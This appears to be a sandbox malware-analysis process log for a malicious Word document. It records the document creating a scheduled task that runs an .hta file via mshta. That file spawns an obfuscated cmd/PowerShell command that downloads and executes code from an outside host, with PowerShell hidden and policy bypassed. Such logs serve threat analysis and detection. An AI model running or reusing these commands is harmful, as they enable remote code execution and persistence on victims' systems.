Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc | |
Source: unknown | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 | |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq% | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ' | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq% | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ' | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
